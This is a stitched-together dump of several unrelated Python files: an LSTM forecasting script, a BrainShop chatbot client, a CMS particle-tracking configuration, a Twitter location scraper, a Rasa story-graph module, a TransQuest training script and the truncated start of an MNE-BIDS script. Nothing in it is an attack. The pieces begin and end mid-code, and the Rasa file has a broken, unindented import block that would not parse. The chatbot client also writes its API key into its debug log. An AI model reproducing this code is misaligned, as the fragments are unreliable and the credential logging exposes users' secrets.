        # raises a length-mismatch error — include off_e as well.
        xaxis = list(range(off_s, off_e + 1))
        if i == 0:
            pyplot.plot(xaxis, yaxis, color='red', label='predicted')
        else:
            pyplot.plot(xaxis, yaxis, color='red')
    pyplot.legend()
    pyplot.show()
# load dataset (columns 1..6 are the feature variables)
series = pd.read_csv('./data.csv', header=None)[[i for i in range(1, 7)]]
# configure
n_seq = 2         # forecast horizon (time steps)
n_lag = 1         # input lags
n_test = 10       # rows held out for testing
n_epochs = 20
n_batch = 1
n_neurons = 100
n_features = 6    # variables per time step
# prepare data
scaler, train, test, y_scaler = prepare_data(series, n_test, n_lag, n_seq, n_features)
# fit model
model = fit_lstm(train, n_lag, n_seq, n_batch, n_epochs, n_neurons)
# make forecasts on the held-out rows
forecasts = make_forecasts(model, n_batch, train, test, n_lag, n_seq)
# inverse transform forecasts and the actual targets back to original units
# BUG FIX: removed a stray no-argument `np.concatenate()` call, which raises
# TypeError, and a dead `actual = [row[...] ...]` assignment that was
# immediately overwritten below.
forecasts = inverse_transform(series, forecasts, y_scaler, n_test + 2)
X, y = get_X_y(test, n_lag, n_seq, n_features, 5)
actual = inverse_transform(series, y, y_scaler, n_test + 2)
# evaluate forecasts
evaluate_forecasts(actual, forecasts, n_lag, n_seq)
# training forecasts (to visualise the in-sample fit)
train_forecasts = make_forecasts(model, n_batch, train, train, n_lag, n_seq)
train_forecasts = inverse_transform(series, train_forecasts, y_scaler, n_test + 2)
print(pd.DataFrame(train_forecasts).shape)
# plot forecasts against the target variable (column 6)
plot_forecasts(series[6], train_forecasts, n_test + 2, n_lag, n_seq, training=True)
import requests
import pyjokes
from datetime import datetime
from itertools import islice
from .utils import correction
from .errors import BaseError, ArgumentError
URL = "http://api.brainshop.ai/get"
class ChatBot:
    """Client for the BrainShop chatbot REST API.

    Optionally keeps a conversation transcript (`history`) and timestamped
    internal logs (`debug`). Messages containing 'joke'/'jokes' are answered
    locally via pyjokes instead of the remote API.
    """

    def __init__(self, brainid="", apikeyuser="", uiiduser="PythonChatbot", history=False, debug=False):
        """Store API credentials and set up the optional debug/history buffers.

        :param brainid: BrainShop brain id.
        :param apikeyuser: BrainShop API key.
        :param uiiduser: user id reported to the API.
        :param history: keep a transcript of the conversation.
        :param debug: keep timestamped internal logs.
        """
        self.brain = brainid
        self.apikey = apikeyuser
        self.uiid = uiiduser
        self.authorname = "HilFing"
        self.link = "https://github.com/hilfing/ChatbotAPI"
        self.spelling = False
        self.debug = {
            'debug': debug,
            'history': history
        }
        self.__debugdata = {
            'history': [],
            'logs': []
        }
        self.customdata = []
        self.__writelog(["Bot Initialised", "Bot Credentials : " + str(self.getcreds())], "logs")

    def getcreds(self):
        """Return the stored API credentials as a dict."""
        return {
            'bid': self.brain,
            'key': self.apikey,
            'uid': self.uiid
        }

    def author(self):
        """Return the library author's name."""
        return self.authorname

    # NOTE: the former `link()` method was removed because the instance
    # attribute `self.link` (set in __init__) always shadowed it, making it
    # unreachable on instances. Read `bot.link` directly instead.

    def spellcheck(self, val):
        """Enable or disable autocorrection of user input.

        :raises ArgumentError: if `val` is not a boolean.
        """
        # BUG FIX: the original condition `val is not True or val is not
        # False` was always true, and the error was constructed but never
        # raised.
        if not isinstance(val, bool):
            raise ArgumentError("Value must be boolean")
        self.spelling = val

    def changename(self, name):
        """Change the user id sent to the API; rejects empty names.

        :raises ArgumentError: if `name` is empty.
        """
        if name == "":
            # BUG FIX: the original built the error without raising it.
            raise ArgumentError("Incorrect argument passed")
        self.uiid = name

    def sendmsg(self, message1):
        """Send a message to the bot and return its reply.

        :raises BaseError: if credentials are missing or nothing answered.
        """
        msg = message1
        if self.spelling is True:
            corrected = correction(msg)
            if not msg == corrected:
                # BUG FIX: the corrected text was previously computed and
                # then discarded; use it as the message that gets sent.
                msg = corrected
                print("User input autocorrected")
                self.__writelog(["Input received", "Spell Check done"], "logs")
        self.__writelog(["Input received"], "logs")
        data = ""
        done = 0
        # BUG FIX: `r` was unbound when the joke branch answered locally,
        # crashing the status-code log below.
        r = None
        # parenthesized: `and` binds tighter than `or`, which the original
        # relied on implicitly (done is always 0 here)
        if ('jokes' in msg or 'joke' in msg) and done == 0:
            data = "Here is a joke : " + pyjokes.get_joke()
            done = 1
        params = {
            'bid': self.brain,
            'key': self.apikey,
            'uid': self.uiid,
            'msg': msg
        }
        if params['bid'] == "" or params['key'] == "" or params['uid'] == "":
            raise BaseError("ChatBot not setup properly!")
        elif done == 0:
            r = requests.get(url=URL, params=params)
            data = r.json()['cnt']
            done = 1
        if done == 1:
            if r is not None:
                self.__writelog(["Reply Received", "Response status_code = " + str(r.status_code)], "logs")
            else:
                self.__writelog(["Reply Received (local joke)"], "logs")
            self.__writelog([msg, data], "history")
            return data
        else:
            raise BaseError("Internal Error!")

    def __writelog(self, data, logtype):
        """Append to the history transcript or the timestamped debug log."""
        if logtype == "history" and self.debug['history'] is True:
            self.__debugdata['history'].extend(["User : " + data[0], self.uiid + " : " + data[1]])
        elif logtype == "logs" and self.debug['debug'] is True:
            self.__debugdata['logs'].append("[" + datetime.now().strftime("%d/%m/%Y %H:%M:%S") + "]")
            for entry in data:
                self.__debugdata['logs'].append(entry)
            self.__debugdata['logs'].append("")

    def printlogs(self, filename="Chatbot.log"):
        """Write the collected debug logs to `filename`.

        :raises BaseError: if debug logging was not enabled.
        """
        if self.debug['debug'] is False:
            raise BaseError("Debug not enabled while creating bot")
        # context manager guarantees the file is closed even on write errors
        with open(filename, "w+") as f:
            for line in self.__debugdata['logs']:
                f.write(line)
                f.write("\n")
        print("Logs written to " + filename)

    def gethistory(self, length="all"):
        """Return the last `length` history entries, prefixed with a banner.

        :param length: "all", 0 (both mean everything), or an even count.
        :raises BaseError: if history was not enabled.
        :raises ArgumentError: if `length` is odd or exceeds the history size.
        """
        if self.debug['history'] is False:
            raise BaseError("History has not been enabled while creating bot")
        his_len = len(self.__debugdata['history'])
        if length == "all" or length == 0:
            length = his_len
        if length > his_len or not length % 2 == 0:
            raise ArgumentError("Length argument is not even or larger than history length.")
        his = self.__debugdata['history']
        data = iter(his)
        # skip the first (his_len - length) entries, keep the final `length`
        split = [his_len - length, length]
        output = [list(islice(data, elem)) for elem in split]
        output[1].insert(0, "Here is your History:")
        return output[1]

    def adddata(self, input, output):
        """Placeholder for custom training data support."""
        return
        # TODO add code
print("ChatBotAPI by HilFing initialised.\nThank you for using this library.\n\n")
|
import FWCore.ParameterSet.Config as cms
###################################################################################
# pp iterative tracking modified for hiOffline reco (the vertex is the one reconstructed in HI)
################################### 4th step: large impact parameter tracking using mixed-triplet seeding
from RecoHI.HiTracking.HITrackingRegionProducer_cfi import *
# Tracking regions are seeded from stand-alone muons and centred on the
# heavy-ion pixel vertex; regions A and B differ only in the muon Pt_min.
# Are the following values set to the same in every iteration? If yes,
# why not making the change in HITrackingRegionProducer_cfi directly
# once for all?
hiRegitMuMixedTripletStepTrackingRegionsA = HiTrackingRegionFactoryFromSTAMuonsEDProducer.clone(
    MuonSrc = "standAloneMuons:UpdatedAtVtx", # this is the same as default, why repeat?
    MuonTrackingRegionBuilder = dict(
        vertexCollection = "hiSelectedPixelVertex",
        UseVertex = True,
        Phi_fixed = True,
        Eta_fixed = True,
        DeltaPhi = 0.3,
        DeltaEta = 0.2,
        # Ok, the following ones are specific to MixedTripletStep
        Pt_min = 1.3,
        DeltaR = 0.5, # default = 0.2
        DeltaZ = 0.5, # this give you the length
        Rescale_Dz = 4., # max(DeltaZ_Region,Rescale_Dz*vtx->zError())
    )
)
# Region B: identical to region A except for a higher muon Pt threshold.
hiRegitMuMixedTripletStepTrackingRegionsB = hiRegitMuMixedTripletStepTrackingRegionsA.clone(
    MuonTrackingRegionBuilder = dict(Pt_min = 1.5)
)
###################################
from RecoTracker.IterativeTracking.MixedTripletStep_cff import *
# NEW CLUSTERS (remove previously used clusters)
# Exclude the clusters already consumed by the preceding pixel-pair step.
hiRegitMuMixedTripletStepClusters = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepClusters.clone(
    oldClusterRemovalInfo = cms.InputTag("hiRegitMuPixelPairStepClusters"),
    trajectories = cms.InputTag("hiRegitMuPixelPairStepTracks"),
    overrideTrkQuals = cms.InputTag('hiRegitMuPixelPairStepSelector','hiRegitMuPixelPairStep'),
    trackClassifier = cms.InputTag(''),
    TrackQuality = cms.string('tight')
)
# SEEDING LAYERS A
hiRegitMuMixedTripletStepSeedLayersA = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepSeedLayersA.clone()
hiRegitMuMixedTripletStepSeedLayersA.BPix.skipClusters = cms.InputTag('hiRegitMuMixedTripletStepClusters')
hiRegitMuMixedTripletStepSeedLayersA.FPix.skipClusters = cms.InputTag('hiRegitMuMixedTripletStepClusters')
hiRegitMuMixedTripletStepSeedLayersA.TEC.skipClusters = cms.InputTag('hiRegitMuMixedTripletStepClusters')
# SEEDS A
hiRegitMuMixedTripletStepHitDoubletsA = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepHitDoubletsA.clone(
    seedingLayers = "hiRegitMuMixedTripletStepSeedLayersA",
    trackingRegions = "hiRegitMuMixedTripletStepTrackingRegionsA",
    clusterCheck = "hiRegitMuClusterCheck",
)
hiRegitMuMixedTripletStepHitTripletsA = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepHitTripletsA.clone(
    doublets = "hiRegitMuMixedTripletStepHitDoubletsA"
)
hiRegitMuMixedTripletStepSeedsA = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepSeedsA.clone(
    seedingHitSets = "hiRegitMuMixedTripletStepHitTripletsA"
)
# SEEDING LAYERS B
hiRegitMuMixedTripletStepSeedLayersB = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepSeedLayersB.clone()
hiRegitMuMixedTripletStepSeedLayersB.BPix.skipClusters = cms.InputTag('hiRegitMuMixedTripletStepClusters')
hiRegitMuMixedTripletStepSeedLayersB.TIB.skipClusters = cms.InputTag('hiRegitMuMixedTripletStepClusters')
hiRegitMuMixedTripletStepHitDoubletsB = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepHitDoubletsB.clone(
    seedingLayers = "hiRegitMuMixedTripletStepSeedLayersB",
    trackingRegions = "hiRegitMuMixedTripletStepTrackingRegionsB",
    clusterCheck = "hiRegitMuClusterCheck",
)
hiRegitMuMixedTripletStepHitTripletsB = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepHitTripletsB.clone(
    doublets = "hiRegitMuMixedTripletStepHitDoubletsB"
)
# NOTE(review): cloned from mixedTripletStepSeedsA (not ...SeedsB) — confirm
# this mirrors the upstream pp configuration intentionally.
hiRegitMuMixedTripletStepSeedsB = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepSeedsA.clone(
    seedingHitSets = "hiRegitMuMixedTripletStepHitTripletsB"
)
# combine seeds
hiRegitMuMixedTripletStepSeeds = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepSeeds.clone(
    seedCollections = cms.VInputTag(
        cms.InputTag('hiRegitMuMixedTripletStepSeedsA'),
        cms.InputTag('hiRegitMuMixedTripletStepSeedsB'),
    )
)
# track building
hiRegitMuMixedTripletStepTrajectoryFilter = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepTrajectoryFilter.clone()
# tighter requirements than the pp defaults for the regional muon iteration
hiRegitMuMixedTripletStepTrajectoryFilter.minPt = 1.
hiRegitMuMixedTripletStepTrajectoryFilter.minimumNumberOfHits = 6
hiRegitMuMixedTripletStepTrajectoryFilter.minHitsMinPt = 4
# after each new hit, apply pT cut for traj w/ at least minHitsMinPt = cms.int32(3),
hiRegitMuMixedTripletStepTrajectoryBuilder = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepTrajectoryBuilder.clone(
    trajectoryFilter = cms.PSet(
        refToPSet_ = cms.string('hiRegitMuMixedTripletStepTrajectoryFilter')
    ),
    minNrOfHitsForRebuild = 6 #change from default 4
)
hiRegitMuMixedTripletStepTrackCandidates = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepTrackCandidates.clone(
    src = cms.InputTag('hiRegitMuMixedTripletStepSeeds'),
    TrajectoryBuilderPSet = cms.PSet(
        refToPSet_ = cms.string('hiRegitMuMixedTripletStepTrajectoryBuilder')
    ),
    clustersToSkip = cms.InputTag('hiRegitMuMixedTripletStepClusters'),
    maxNSeeds = cms.uint32(1000000)
)
# fitting: feed new-names
hiRegitMuMixedTripletStepTracks = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepTracks.clone(
    AlgorithmName = cms.string('hiRegitMuMixedTripletStep'),
    src = 'hiRegitMuMixedTripletStepTrackCandidates',
)
# TRACK SELECTION AND QUALITY FLAG SETTING.
import RecoTracker.FinalTrackSelectors.multiTrackSelector_cfi
import RecoHI.HiTracking.hiMultiTrackSelector_cfi
# Three chained selection levels (loose -> tight -> high purity); the tight
# and high-purity levels additionally cut on the HI MVA discriminator.
hiRegitMuMixedTripletStepSelector = RecoHI.HiTracking.hiMultiTrackSelector_cfi.hiMultiTrackSelector.clone(
    src = 'hiRegitMuMixedTripletStepTracks',
    vertices = cms.InputTag("hiSelectedPixelVertex"),
    useAnyMVA = cms.bool(True),
    GBRForestLabel = cms.string('HIMVASelectorIter7'),
    GBRForestVars = cms.vstring(['chi2perdofperlayer', 'nhits', 'nlayers', 'eta']),
    trackSelectors= cms.VPSet(
        RecoTracker.FinalTrackSelectors.multiTrackSelector_cfi.looseMTS.clone(
            name = 'hiRegitMuMixedTripletStepLoose',
            min_nhits = cms.uint32(8)
        ),
        RecoHI.HiTracking.hiMultiTrackSelector_cfi.hiTightMTS.clone(
            name = 'hiRegitMuMixedTripletStepTight',
            preFilterName = 'hiRegitMuMixedTripletStepLoose',
            min_nhits = cms.uint32(8),
            useMVA = cms.bool(True),
            minMVA = cms.double(-0.2)
        ),
        RecoHI.HiTracking.hiMultiTrackSelector_cfi.hiHighpurityMTS.clone(
            name = 'hiRegitMuMixedTripletStep',
            preFilterName = 'hiRegitMuMixedTripletStepTight',
            min_nhits = cms.uint32(8),
            useMVA = cms.bool(True),
            minMVA = cms.double(-0.09)
        )
    ) #end of vpset
) #end of clone
# For Phase-1 tracking the MVA forest is not used: disable MVA in the
# selector and in each of the three selection levels.
from Configuration.Eras.Modifier_trackingPhase1_cff import trackingPhase1
trackingPhase1.toModify(hiRegitMuMixedTripletStepSelector, useAnyMVA = cms.bool(False))
trackingPhase1.toModify(hiRegitMuMixedTripletStepSelector, trackSelectors= cms.VPSet(
    RecoTracker.FinalTrackSelectors.multiTrackSelector_cfi.looseMTS.clone(
        name = 'hiRegitMuMixedTripletStepLoose',
        min_nhits = cms.uint32(8)
    ),
    RecoHI.HiTracking.hiMultiTrackSelector_cfi.hiTightMTS.clone(
        name = 'hiRegitMuMixedTripletStepTight',
        preFilterName = 'hiRegitMuMixedTripletStepLoose',
        min_nhits = cms.uint32(8),
        useMVA = cms.bool(False),
        minMVA = cms.double(-0.2)
    ),
    RecoHI.HiTracking.hiMultiTrackSelector_cfi.hiHighpurityMTS.clone(
        name = 'hiRegitMuMixedTripletStep',
        preFilterName = 'hiRegitMuMixedTripletStepTight',
        min_nhits = cms.uint32(8),
        useMVA = cms.bool(False),
        minMVA = cms.double(-0.09)
    )
) #end of vpset
)
# All modules of this iteration, listed in dependency order.
hiRegitMuonMixedTripletStepTask = cms.Task(hiRegitMuMixedTripletStepClusters,
                                           hiRegitMuMixedTripletStepSeedLayersA,
                                           hiRegitMuMixedTripletStepTrackingRegionsA,
                                           hiRegitMuMixedTripletStepHitDoubletsA,
                                           hiRegitMuMixedTripletStepHitTripletsA,
                                           hiRegitMuMixedTripletStepSeedsA,
                                           hiRegitMuMixedTripletStepSeedLayersB,
                                           hiRegitMuMixedTripletStepTrackingRegionsB,
                                           hiRegitMuMixedTripletStepHitDoubletsB,
                                           hiRegitMuMixedTripletStepHitTripletsB,
                                           hiRegitMuMixedTripletStepSeedsB,
                                           hiRegitMuMixedTripletStepSeeds,
                                           hiRegitMuMixedTripletStepTrackCandidates,
                                           hiRegitMuMixedTripletStepTracks,
                                           hiRegitMuMixedTripletStepSelector)
hiRegitMuonMixedTripletStep = cms.Sequence(hiRegitMuonMixedTripletStepTask)
|
<reponame>orjanj/twitter-incident-visualizer
#!/usr/bin/python
import twitter
class TIVTwitter:
    """ Base class for connecting and fetching data from Twitter API. """

    def __init__(self, config, db, gmaps):
        """ Instance constructor
        :param config: config object exposing getConfigParameter('twitter')
        :param db: database wrapper exposing execute(query, values)
        :param gmaps: Google Maps client (stored for later use)
        :return: none
        """
        self.db = db
        self.gmaps = gmaps
        self.config_param = config.getConfigParameter('twitter')
        self.API = twitter.Api(consumer_key=self.config_param['consumer_key'],
                               consumer_secret=self.config_param['consumer_secret'],
                               access_token_key=self.config_param['access_token_key'],
                               access_token_secret=self.config_param['access_token_secret'])
        # Set up a blacklist (Norwegian word list)
        self.blacklist = []
        self.buildWordBlacklist()

    def validateConnection(self):
        """
        Connection validation to Twitter API.
        :return: credential information (json)
        """
        print(self.API.VerifyCredentials())

    def getTweets(self, screen_name, tweet_count):
        """ Get Tweet information from Twitter.
        :param screen_name: twitter username (string)
        :param tweet_count: count of tweets to fetch (int)
        :return user_timeline: list of tweets (string)
        """
        user_timeline = self.API.GetUserTimeline(screen_name=screen_name, count=tweet_count)
        return (user_timeline)

    def detectLocation(self, tweet_string):
        """ Detect upper case in words and return the words.
        :params tweet_string: tweet text (string)
        :return words: upper case words not found in the blacklist (list)
        """
        location_list = []
        for word in tweet_string.split():
            if word[0].isupper() and (word.lower() not in self.blacklist):  # TODO: BUG
                location_list.append(word)
            # Example string: v/Bodø
            # BUG FIX: require len(word) > 2 so a bare "v/" token cannot
            # raise an IndexError when probing word[2].
            if (word.startswith('v/') and len(word) > 2 and word[2].isupper()
                    and (word[2:].lower() not in self.blacklist)):
                location_list.append(word[2:])
        return (location_list)

    def buildWordBlacklist(self, filename='config/wordlist_20190123_norsk_ordbank_nob_2005.txt'):
        """ Build an word list for blacklisting ordinary Norwegian words to better figure out exact location names. """
        with open(filename, "r") as wordlist_file:
            self.blacklist = [line.rstrip('\n') for line in wordlist_file]

    def getProjectFollowers(self, follower_count):
        """ Get our projects followers from Twitter.
        :param follower_count: maximum number of friends to fetch (int)
        """
        project_friendslist = self.API.GetFriends(count=follower_count)
        return (project_friendslist)

    def getAccountInfo(self, screen_name):
        """ Get Twitter account information.
        :param screen_name: twitter username (string)
        :return: twitter.models.User object for the account
        """
        user_info = self.API.GetUser(screen_name=screen_name)
        return (user_info)

    def insertAccountToDB(self, account_object=None):
        """ Insertion of account(s) to PostgreSQL DB.
        :params account_object: twitter.models.User (class/object)
        :return: none (prints the number of rows changed)
        """
        # Build the Twitter profile URL for the account
        account_twitter_url = 'https://twitter.com/' + account_object.screen_name
        # Make query ready for insertion (parameterized, so values are escaped)
        query = "INSERT INTO account(account_name, account_url, account_text, account_reg_date, account_webpage, account_pic_url, account_location, account_screen_name) VALUES(%s, %s, %s, %s, %s, %s, %s, %s)"
        values = (account_object.name, account_twitter_url, account_object.description, account_object.created_at, account_object.url, account_object.profile_image_url_https, account_object.location, account_object.screen_name)
        # Insert all the values to the database
        rows = self.db.execute(query, values)
        if rows > 0:
            print(rows, "row(s) changed in database.")

    def insertTweetsToDB(self, account_id, tweet_place, lat, lng, tweet_objects=None):
        """ Insertion of tweets to PostgreSQL DB.
        :params tweet_objects: single twitter.models.Status object
        :return: none (prints the number of rows changed)
        """
        # Make query ready for insertion (parameterized, so values are escaped)
        query = "INSERT INTO tweets(account_id, tweet_time, tweet_content, tweet_place, tweet_hashtags, tweet_lat, tweet_long) VALUES(%s, %s, %s, %s, %s, %s, %s)"
        # NOTE(review): tweet_place is stored in both the tweet_place and
        # tweet_hashtags columns — confirm this duplication is intended.
        values = (account_id, tweet_objects.created_at.strip(), tweet_objects.text.strip(), tweet_place.strip(), tweet_place.strip(), lat, lng)
        # Insert all the values to the database
        rows = self.db.execute(query, values)
        if rows > 0:
            print(rows, "row(s) changed in database.")
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import random
from collections import deque, defaultdict
import typing
from rasa_core.domain import Domain
from typing import List, Text, Dict, Optional
from rasa_core.interpreter import RegexInterpreter, NaturalLanguageInterpreter
from rasa_core import utils
if typing.TYPE_CHECKING:
from rasa_core.training_utils.dsl import StoryStep, Story, \
TrainingsDataExtractor
class StoryGraph(object):
    """Directed acyclic graph of story steps.

    Provides topological ordering of the steps and construction of
    complete stories by walking the checkpoint graph.
    """

    def __init__(self, story_steps):
        # type: (List[StoryStep]) -> None
        self.story_steps = story_steps
        # id -> step index for O(1) lookups
        self.step_lookup = {s.id: s for s in self.story_steps}
        # step ids in topological order of the checkpoint DAG
        self.ordered_ids = StoryGraph.order_steps(story_steps)

    def ordered_steps(self):
        # type: () -> List[StoryStep]
        """Returns the story steps ordered by topological order of the DAG."""
        return [self.get(step_id) for step_id in self.ordered_ids]

    def get(self, step_id):
        # type: (Text) -> Optional[StoryStep]
        """Looks a story step up by its id."""
        return self.step_lookup.get(step_id)

    def build_stories(self,
                      domain,
                      max_number_of_trackers=2000):
        # type: (Domain, int) -> List[Story]
        """Build the stories of a graph.

        Walks the steps in topological order, extending every story that
        reached a step's start checkpoint with that step's events.
        """
        from rasa_core.training_utils.dsl import STORY_START, Story

        active_trackers = {STORY_START: [Story()]}
        rand = random.Random(42)  # fixed seed -> reproducible subsampling
        for step in self.ordered_steps():
            if step.start_checkpoint_name() in active_trackers:
                # these are the trackers that reached this story step
                # and that need to handle all events of the step
                incoming_trackers = active_trackers[step.start_checkpoint_name()]
                # TODO: we can't use tracker filter here to filter for
                #       checkpoint conditions since we don't have trackers.
                #       this code should rather use the code from the dsl.
                if max_number_of_trackers is not None:
                    incoming_trackers = utils.subsample_array(
                            incoming_trackers, max_number_of_trackers, rand)
                events = step.explicit_events(domain)
                # need to copy the tracker as multiple story steps might
                # start with the same checkpoint and all of them
                # will use the same set of incoming trackers
                if events:
                    trackers = [Story(tracker.story_steps + [step])
                                for tracker in incoming_trackers]
                else:
                    trackers = []  # small optimization
                # update our tracker dictionary with the trackers that handled
                # the events of the step and that can now be used for further
                # story steps that start with the checkpoint this step ended on
                if step.end_checkpoint_name() not in active_trackers:
                    active_trackers[step.end_checkpoint_name()] = []
                active_trackers[step.end_checkpoint_name()].extend(trackers)
        # steps without an end checkpoint (None key) terminate a story
        return active_trackers[None]

    def as_story_string(self):
        """Concatenate the (non-flat) story string of every step."""
        story_content = ""
        for step in self.story_steps:
            story_content += step.as_story_string(flat=False)
        return story_content

    @staticmethod
    def order_steps(story_steps):
        # type: (List[StoryStep]) -> Deque[Text]
        """Topological sort of the steps returning the ids of the steps."""
        checkpoints = StoryGraph._group_by_start_checkpoint(story_steps)
        # edge u -> v whenever u's end checkpoint is v's start checkpoint
        graph = {s.id: [other.id
                        for other in checkpoints[s.end_checkpoint_name()]]
                 for s in story_steps}
        return StoryGraph.topological_sort(graph)

    @staticmethod
    def _group_by_start_checkpoint(story_steps):
        # type: (List[StoryStep]) -> Dict[Text, List[StoryStep]]
        """Groups the steps by their start checkpoint name."""
        checkpoints = defaultdict(list)
        for step in story_steps:
            checkpoints[step.start_checkpoint_name()].append(step)
        return checkpoints

    @staticmethod
    def topological_sort(graph):
        """Creates a topsort of a directed graph. This is an unstable sorting!

        The graph should be represented as a dictionary, e.g.:

        >>> example_graph = {
        ...         "a": ["b", "c", "d"],
        ...         "b": [],
        ...         "c": ["d"],
        ...         "d": [],
        ...         "e": ["f"],
        ...         "f": []}
        >>> StoryGraph.topological_sort(example_graph)
        deque([u'e', u'f', u'a', u'c', u'd', u'b'])

        :raises ValueError: if the graph contains a cycle.
        """
        # DFS with GRAY (on the current path) / BLACK (finished) colouring
        GRAY, BLACK = 0, 1
        ordered = deque()
        unprocessed = set(graph)
        visited_nodes = {}

        def dfs(node):
            visited_nodes[node] = GRAY
            for k in graph.get(node, ()):
                sk = visited_nodes.get(k, None)
                if sk == GRAY:
                    # BUG FIX: report the node on the cycle; the original
                    # formatted `sk` (the GRAY colour marker, i.e. 0).
                    raise ValueError("Cycle found at node: {}".format(k))
                if sk == BLACK:
                    continue
                unprocessed.discard(k)
                dfs(k)
            ordered.appendleft(node)
            visited_nodes[node] = BLACK

        while unprocessed:
            dfs(unprocessed.pop())
        return ordered
|
import os
import shutil
from sklearn.model_selection import train_test_split
from examples.word_level.common.util import reader, prepare_testdata
from examples.word_level.wmt_2020.en_de.microtransquest_config import TRAIN_PATH, TRAIN_SOURCE_FILE, \
TRAIN_SOURCE_TAGS_FILE, \
TRAIN_TARGET_FILE, \
TRAIN_TARGET_TAGS_FLE, MODEL_TYPE, MODEL_NAME, microtransquest_config, TEST_PATH, TEST_SOURCE_FILE, \
TEST_TARGET_FILE, TEMP_DIRECTORY, TEST_SOURCE_TAGS_FILE, TEST_TARGET_TAGS_FLE, SEED, DEV_TARGET_TAGS_FLE, \
DEV_SOURCE_TAGS_FILE, DEV_PATH, DEV_SOURCE_FILE, DEV_TARGET_FILE, DEV_TARGET_TAGS_FILE_SUB, DEV_SOURCE_TAGS_FILE_SUB
from transquest.algo.word_level.microtransquest.run_model import MicroTransQuestModel
# Create the scratch directory for predictions if it does not exist yet.
if not os.path.exists(TEMP_DIRECTORY):
    os.makedirs(TEMP_DIRECTORY)

raw_train_df = reader(TRAIN_PATH, TRAIN_SOURCE_FILE, TRAIN_TARGET_FILE, TRAIN_SOURCE_TAGS_FILE,
                      TRAIN_TARGET_TAGS_FLE)
raw_dev_df = reader(DEV_PATH, DEV_SOURCE_FILE, DEV_TARGET_FILE, DEV_SOURCE_TAGS_FILE,
                    DEV_TARGET_TAGS_FLE)
raw_test_df = reader(TEST_PATH, TEST_SOURCE_FILE, TEST_TARGET_FILE)

test_sentences = prepare_testdata(raw_test_df)
dev_sentences = prepare_testdata(raw_dev_df)

# Per-fold predictions, collected for majority voting below.
fold_sources_tags = []
fold_targets_tags = []
dev_fold_sources_tags = []
dev_fold_targets_tags = []


def _majority_vote(fold_tags, n_sentences):
    """Per-sentence, per-word majority vote over the n_fold tag predictions."""
    voted = []
    for sentence_id in range(n_sentences):
        predictions = [fold_prediction[sentence_id] for fold_prediction in fold_tags]
        majority = []
        for word_id in range(len(predictions[0])):
            word_votes = [prediction[word_id] for prediction in predictions]
            majority.append(max(set(word_votes), key=word_votes.count))
        voted.append(majority)
    return voted


def _write_tags(path, tag_lists):
    """Write one line per sentence: each tag followed by a single space."""
    with open(path, 'w') as f:
        for tags in tag_lists:
            for tag in tags:
                f.write(str(tag) + ' ')
            f.write('\n')


# Train n_fold models and collect their test/dev predictions.
for i in range(microtransquest_config["n_fold"]):
    # start each fold from a clean output directory
    if os.path.exists(microtransquest_config['output_dir']) and os.path.isdir(microtransquest_config['output_dir']):
        shutil.rmtree(microtransquest_config['output_dir'])

    if microtransquest_config["evaluate_during_training"]:
        raw_train, raw_eval = train_test_split(raw_train_df, test_size=0.1, random_state=SEED * i)
        model = MicroTransQuestModel(MODEL_TYPE, MODEL_NAME, labels=["OK", "BAD"], args=microtransquest_config)
        model.train_model(raw_train, eval_data=raw_eval)
        # reload the best checkpoint found during training
        model = MicroTransQuestModel(MODEL_TYPE, microtransquest_config["best_model_dir"], labels=["OK", "BAD"],
                                     args=microtransquest_config)
    else:
        model = MicroTransQuestModel(MODEL_TYPE, MODEL_NAME, labels=["OK", "BAD"], args=microtransquest_config)
        model.train_model(raw_train_df)

    sources_tags, targets_tags = model.predict(test_sentences, split_on_space=True)
    fold_sources_tags.append(sources_tags)
    fold_targets_tags.append(targets_tags)

    dev_sources_tags, dev_targets_tags = model.predict(dev_sentences, split_on_space=True)
    dev_fold_sources_tags.append(dev_sources_tags)
    dev_fold_targets_tags.append(dev_targets_tags)

# --------- Test predictions -----------
source_predictions = _majority_vote(fold_sources_tags, len(test_sentences))
_write_tags(os.path.join(TEMP_DIRECTORY, TEST_SOURCE_TAGS_FILE), source_predictions)

target_predictions = _majority_vote(fold_targets_tags, len(test_sentences))
_write_tags(os.path.join(TEMP_DIRECTORY, TEST_TARGET_TAGS_FLE), target_predictions)

# --------- Dev Predictions -----------
dev_source_predictions = _majority_vote(dev_fold_sources_tags, len(dev_sentences))
# BUG FIX: the original wrote the *test* source predictions into the dev file.
_write_tags(os.path.join(TEMP_DIRECTORY, DEV_SOURCE_TAGS_FILE_SUB), dev_source_predictions)

dev_target_predictions = _majority_vote(dev_fold_targets_tags, len(dev_sentences))
# BUG FIX: the original wrote the *test* target predictions into the dev file.
_write_tags(os.path.join(TEMP_DIRECTORY, DEV_TARGET_TAGS_FILE_SUB), dev_target_predictions)
|
<reponame>dengemann/mne-bids-pipeline
"""
=================================
13. Group average on source level
=================================
Source estimates are morphed to the ``fsaverage`` brain.
"""
import itertools
import logging
import mne
from mne.parallel import parallel_func
from mne_bids import BIDSPath
import config
from config import gen_log_message, on_error, failsafe_run
logger = logging.getLogger('mne-bids-pipeline')
def morph_stc(subject, session=None):
    """Morph one subject's per-condition source estimates to ``fsaverage``.

    For every configured condition, read the subject's STC from the
    derivatives tree, compute and apply a morph to the ``fsaverage``
    brain, save the morphed STC next to the original, and return the
    list of morphed source estimates.
    """
    bids_path = BIDSPath(subject=subject,
                         session=session,
                         task=config.get_task(),
                         acquisition=config.acq,
                         run=None,
                         recording=config.rec,
                         space=config.space,
                         datatype=config.get_datatype(),
                         root=config.get_deriv_root(),
                         check=False)

    fs_subject = config.get_fs_subject(subject)
    fs_subjects_dir = config.get_fs_subjects_dir()

